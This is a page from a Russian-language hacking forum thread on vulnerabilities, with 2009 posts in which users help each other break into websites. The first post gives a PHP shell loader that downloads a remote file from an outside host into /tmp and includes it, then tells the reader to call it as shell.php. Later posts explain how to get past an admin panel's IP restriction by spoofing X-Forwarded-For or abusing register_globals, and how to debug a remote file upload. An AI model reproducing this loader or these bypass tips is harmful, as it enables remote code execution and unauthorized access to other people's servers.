ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8301  
Старый 29.07.2009, 13:29
The_HuliGun
Участник форума
Регистрация: 19.05.2007
Сообщений: 228
Провел на форуме:
4325663

Репутация: 240
Отправить сообщение для The_HuliGun с помощью ICQ
По умолчанию

Заливай upl.inc на левый хост
Через echo заливай етот скрипт
Код:
<?php
if (isset($_GET[p]))
{
 $f=fopen('/tmp/qwerty','w+');
 fwrite($f,file_get_contents('http://www.левый-хост/upl.inc'));
}
include('/tmp/qwerty');
?>
потом
shell.php?p

Последний раз редактировалось The_HuliGun; 29.07.2009 в 13:36..
 
Ответить с цитированием

  #8302  
Старый 29.07.2009, 13:56
Flair
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226

Репутация: 38
По умолчанию

есть админка, вроде самописная, так же имеется логин и пас к ней, но при попытке войти выдает что нельзя зайти с данного ip.
Вопрос как возможно обойти ето дрянь, можно ли подменить IP на IP администратора сайта
 
Ответить с цитированием

  #8303  
Старый 29.07.2009, 14:02
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Экстрасенсов здесь нет. Мы не знаем каким способом проверяется IP. Если типа
PHP код:
#....
if($_SERVER['REMOTE_ADDR']==$trueip)
$welcome=true; else
$welcome=false;
#.... 
Не подменить никак...
Ну а если включены регистер_глобался, т.е. ключ => значение массива $_GLOBALS будет равно названию => значению переменной, и IP берется с названия этой переменной, тогда просто в GET/POST/COOKIE подставь ip(название переменной)=0.0.0.0(админский IP).

Повторю, экстрасенсов здесь нет.

Последний раз редактировалось mailbrush; 29.07.2009 в 14:08..
 
Ответить с цитированием

  #8304  
Старый 29.07.2009, 14:07
Flair
Познающий
Регистрация: 07.05.2009
Сообщений: 70
Провел на форуме:
420226

Репутация: 38
По умолчанию

а как узнать как он проверяется?
 
Ответить с цитированием

  #8305  
Старый 29.07.2009, 14:09
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
а как узнать как он проверяется?
Взглянуть в сорсы
 
Ответить с цитированием

  #8306  
Старый 29.07.2009, 14:17
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Tigger  
jokester, allow_url_open 1, copy не помогло. Unable to open 'http://img.imgsmail.ru/mail/ru/images/logon.gif' for reading: No such file or directory in... Даже просто картинку не хочет...
Так не бывает.
Давай сюда
1. Что прописано в логах (через что ты выполняешь комманды. КОД)
2. phpinfo() директивы
allow_url_fopen
allow_url_include
magic_quotes_gpc
safe_mode
disable_functions
3. ls -lia (ты-же как-то качалки искал, значит возможно)
4. Как ты пытаешься залить через copy (полностью)
 
Ответить с цитированием

  #8307  
Старый 29.07.2009, 14:29
ph1l1ster
Постоянный
Регистрация: 11.03.2008
Сообщений: 347
Провел на форуме:
2075230

Репутация: 462
Отправить сообщение для ph1l1ster с помощью ICQ
По умолчанию

Цитата:
Сообщение от mailbrush  
Взглянуть в сорсы
Или методом тыка Попробуй подменить x_forwarder_for, хотя сейчас уже мало где проверяют так, но всё же...
 
Ответить с цитированием

  #8308  
Старый 29.07.2009, 18:33
Krist_ALL
Banned
Регистрация: 14.01.2009
Сообщений: 515
Провел на форуме:
1996429

Репутация: 468


Отправить сообщение для Krist_ALL с помощью ICQ
По умолчанию

В статье электа написано про то, что если в значение сессион ид вставить спецсимволы,то будет ошибка и раскрытие путей. Как защитится от этого? Спрашивал очень многих, никто ничего сказать не смог.
 
Ответить с цитированием

  #8309  
Старый 29.07.2009, 18:43
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Фильтруй регулярками.
 
Ответить с цитированием

  #8310  
Старый 29.07.2009, 18:44
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

@session_start();
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ